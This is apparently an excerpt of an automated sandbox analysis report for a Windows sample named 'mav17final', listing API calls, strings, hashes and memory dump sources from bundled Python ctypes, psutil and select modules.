                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Err_ErrorLast_errno$State_UnraisableWrite$CheckContainsDict_EnsureFunctionObject_ReleaseResultStringSubtypeType_VectorcallWarnmemcpy
                                                  • String ID: Parsing argument %zd$cannot build parameter$create argument %zd:$getting _needs_com_addref_$memory leak in callback function.$on calling ctypes callback function$on converting result of ctypes callback function$unexpected result of create argument %zd:
                                                  • API String ID: 1331253392-2697724128
                                                  • Opcode ID: 662eda2fa9ad5fa4c0407cff36c88571a43e939dd8943eeb715751b67e50d2ce
                                                  • Instruction ID: 11aba1ae14d1602639fee622c5b797bd818907b5c4a8aa504e1fb5e9e277e6b3
                                                  • Opcode Fuzzy Hash: 662eda2fa9ad5fa4c0407cff36c88571a43e939dd8943eeb715751b67e50d2ce
                                                  • Instruction Fuzzy Hash: 6CB14722A09BC286EB50DF29D8545B82BA0FF46BEAF499535DB5E477A4DF3CE444C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$Thread$CloseCreateErrorHandleLastObjectSingleTerminateWait
                                                  • String ID: (originated from %s)$CreateThread$GetExitCodeThread$GetExitCodeThread (failed) -> TerminateThread$TerminateThread$WaitForSingleObject$WaitForSingleObject -> WAIT_FAILED$WaitForSingleObject -> WAIT_FAILED -> TerminateThread$get handle name thread timed out after %i ms$psutil-debug [%s:%d]> $psutil/arch/windows/process_handles.c
                                                  • API String ID: 4284840722-1322275399
                                                  • Opcode ID: 9dd7a0f0f07ac5019de236ac24ecf5f1858d8291b80df825920e46def3d78e7e
                                                  • Instruction ID: 953d92833106573419d6e64965fbfa7ae0891b4612ca24f2c98c9e67582b03a1
                                                  • Opcode Fuzzy Hash: 9dd7a0f0f07ac5019de236ac24ecf5f1858d8291b80df825920e46def3d78e7e
                                                  • Instruction Fuzzy Hash: 2D511A24E0DAC792FE549F29E8553B92B61BFA47E1F405036DB0F462A1DE3CE84AC351
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Object_$AttrDeallocString$Err_$Format$CallDict_LookupMakeMallocMem_OccurredSizeUnicode_Updatestrchr
                                                  • String ID: __ctype_be__$__ctype_le__$_type_ '%s' not supported$cbBhHiIlLdfuzZqQPXOv?g$class must define a '_type_' attribute$class must define a '_type_' attribute which must bea single character string containing one of '%s'.$class must define a '_type_' attribute which must be a string of length 1$class must define a '_type_' string attribute
                                                  • API String ID: 692835343-917751260
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Err_$Object_$AttrLong_LookupMallocMem_String$CallDict_ExceptionMakeMatchesMemoryOccurredSignSsize_tUpdate
                                                  • String ID: The '_length_' attribute is too large$The '_length_' attribute must be an integer$The '_length_' attribute must not be negative$_type_ must have storage info$array too large$class must define a '_length_' attribute$class must define a '_type_' attribute
                                                  • API String ID: 4019195241-504660705
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Number_OccurredSsize_t$FromString$Bytes_Mem_SizeUnicode_$CharCheckFreeIndex_List_MallocMemoryWide
                                                  • String ID: Pointer indices must be integer$slice start is required for step < 0$slice step cannot be zero$slice stop is required
                                                  • API String ID: 3053630023-3059441807
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$FromLong_$Err_Void$Object_StringUnraisableWrite$ArgsAttrCallFunctionImportImport_InternLongModuleOccurredUnicode_
                                                  • String ID: DllGetClassObject$_ctypes.DllGetClassObject$ctypes
                                                  • API String ID: 375360433-177550262
                                                  APIs
                                                  • _PyTime_FromSecondsObject.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98422BF
                                                  • PyErr_ExceptionMatches.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98422D3
                                                  • PyErr_SetString.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B984231F
                                                    • Part of subcall function 00007FF8B98425C8: PySequence_Fast.PYTHON311(00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98425F0
                                                  • _PyDeadline_Init.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98423DA
                                                  • PyEval_SaveThread.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B984241A
                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842423
                                                  • select.WS2_32 ref: 00007FF8B984243D
                                                  • PyEval_RestoreThread.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842449
                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B984244F
                                                  • PyErr_CheckSignals.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B984245E
                                                  • _PyDeadline_Get.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842479
                                                  • _PyTime_AsTimeval_clamp.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842497
                                                  • PyErr_Occurred.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98424F2
                                                  • PyTuple_Pack.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842509
                                                  • _Py_Dealloc.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842520
                                                  • _Py_Dealloc.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842534
                                                  • _Py_Dealloc.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B9842548
                                                  • WSAGetLastError.WS2_32(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98425AE
                                                  • PyErr_SetExcFromWindowsErr.PYTHON311(?,?,?,00007FF8A8D96CC8,?,?,00007FF8B984224F), ref: 00007FF8B98425C0
                                                    • Part of subcall function 00007FF8B98425C8: PyObject_AsFileDescriptor.PYTHON311(?,?,00007FF8B984224F), ref: 00007FF8B984265C
                                                    • Part of subcall function 00007FF8B98425C8: PyErr_SetString.PYTHON311(?,?,00007FF8B984224F), ref: 00007FF8B98426CA
                                                    • Part of subcall function 00007FF8B98425C8: _Py_Dealloc.PYTHON311(?,?,00007FF8B984224F), ref: 00007FF8B98426D9
                                                    • Part of subcall function 00007FF8B98425C8: _Py_Dealloc.PYTHON311(?,?,00007FF8B984224F), ref: 00007FF8B98426E8
                                                    • Part of subcall function 00007FF8B98425C8: _Py_Dealloc.PYTHON311(?,?,00007FF8B984224F), ref: 00007FF8B98426FE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_$Deadline_Eval_FromStringThreadTime__errno$CheckDescriptorErrorExceptionFastFileInitLastMatchesObjectObject_OccurredPackRestoreSaveSecondsSequence_SignalsTimeval_clampTuple_Windowsselect
                                                  • String ID: timeout must be a float or None$timeout must be non-negative
                                                  • API String ID: 1581318368-2150404077
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_$CallDict_Err_FreeFunctionItemMallocObject_$DeallocErrorFromLong_OccurredStringUnicode_VoidWith
                                                  • String ID: LP_%s$_type_$must be a ctypes type$s(O){sO}$s(O){}
                                                  • API String ID: 2461613936-2311978994
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$ErrorLast$OpenProcess
                                                  • String ID: OpenProcess$OpenProcess -> ERROR_INVALID_PARAMETER$OpenProcess -> ERROR_SUCCESS$OpenProcess -> ERROR_SUCCESS turned into AD$OpenProcess -> ERROR_SUCCESS turned into NSP$TerminateProcess$automatically set for PID 0$psutil-debug [%s:%d]> $psutil/arch/windows/process_utils.c
                                                  • API String ID: 1112334068-589840707
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CloseHandle$OpenProcessToken$AccountInformationLookup
                                                  • String ID: (originated from %s)$GetTokenInformation$LookupAccountSidW$LookupAccountSidW -> ERROR_NONE_MAPPED$OpenProcess$OpenProcessToken$automatically set for PID 0
                                                  • API String ID: 87002634-2228157761
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: From$Bytes_Err_Mem_SizeSlice_StringUnicode_$AdjustCharCheckFreeIndex_IndicesList_MallocMemoryNumber_OccurredSsize_tUnpackWide
                                                  • String ID: indices must be integers
                                                  • API String ID: 4188490530-2024404580
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GetExitCodeProcess$OpenProcess$WaitForSingleObject$WaitForSingleObject() -> WAIT_ABANDONED$WaitForSingleObject() returned WAIT_ABANDONED$WaitForSingleObject() returned WAIT_TIMEOUT$automatically set for PID 0$psutil-debug [%s:%d]> $psutil/_psutil_windows.c
                                                  • API String ID: 0-2011784859
                                                  APIs
                                                  • PyUnicode_FromFormatV.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D4C5
                                                  • PyErr_Fetch.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D4E4
                                                  • PyErr_NormalizeException.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D4F6
                                                  • PyType_GetName.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D50D
                                                  • PyObject_Str.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D515
                                                  • PyUnicode_AppendAndDel.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D527
                                                  • PyUnicode_FromString.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D534
                                                  • PyUnicode_AppendAndDel.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D541
                                                  • PyErr_Clear.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D550
                                                  • PyObject_Str.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D55A
                                                  • PyErr_Clear.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D565
                                                  • PyUnicode_FromString.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D572
                                                  • PyUnicode_AppendAndDel.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D57F
                                                  • PyErr_SetObject.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D594
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D5A9
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D5BE
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D5D3
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B9F67997), ref: 00007FF8B9F6D5E8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Unicode_$Err_$Dealloc$AppendFrom$ClearObject_String$ExceptionFetchFormatNameNormalizeObjectType_
                                                  • String ID: ???
                                                  • API String ID: 979652146-1053719742
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$String$DeallocEval_Thread$AddressArg_AttrAuditFormatLong_Object_OccurredParseProcRestoreSaveSizeSys_Tuple_Void
                                                  • String ID: Os:in_dll$_handle$could not convert the _handle attribute to a pointer$ctypes.dlsym$symbol '%s' not found$the _handle attribute of the second argument must be an integer
                                                  • API String ID: 1915345233-3856192562
                                                  • Opcode ID: 7ca03c74892ce7554a02cb8c30f6c35098380688a7c70d2a3342523bcc2a4215
                                                  • Instruction ID: 52e25f89cd49551192c6d03ad898fe681f0d13bda75a6d726745706261349b3c
                                                  • Opcode Fuzzy Hash: 7ca03c74892ce7554a02cb8c30f6c35098380688a7c70d2a3342523bcc2a4215
                                                  • Instruction Fuzzy Hash: DB31EC31A19F8281EA449F2EE8541796BA0FF86FE6F195035DB0E47765DF2CE489C300
                                                  APIs
                                                  • PyObject_GetAttrString.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F756
                                                  • PySequence_Fast.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F772
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F784
                                                  • PyArg_ParseTuple.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F7E8
                                                  • PyObject_GetAttr.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F802
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F854
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F8D0
                                                  • PyObject_SetAttr.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F8E4
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F8F8
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F917
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F931
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F940
                                                  • PyErr_SetString.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F972
                                                  • _Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B9F68C2F), ref: 00007FF8B9F6F983
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$AttrObject_$String$Arg_Err_FastParseSequence_Tuple
                                                  • String ID: OO|O$_fields_$_fields_ must be a sequence$unexpected type
                                                  • API String ID: 1182381414-2418103425
                                                  • Opcode ID: 9a21982e818a441de51ee13329167cb0591f09edfc229330b12a1e4341a6436c
                                                  • Instruction ID: 42d7118b5ffb7d0dc3c19ab1a4ac4f7ff564fa90a382d0645403b19612bb7cb5
                                                  • Opcode Fuzzy Hash: 9a21982e818a441de51ee13329167cb0591f09edfc229330b12a1e4341a6436c
                                                  • Instruction Fuzzy Hash: FB614A72A09F8692EA648F2AE94417967A0FF4ABF2F186135CB5E03764DF3CE455C300
                                                  APIs
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6504E
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65065
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6507D
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650A0
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650C6
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650EC
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65112
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65138
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6515E
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65181
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651A7
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651CD
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651F3
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65219
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6523F
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6526C
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65281
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F652A0
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F652B1
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F652D3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
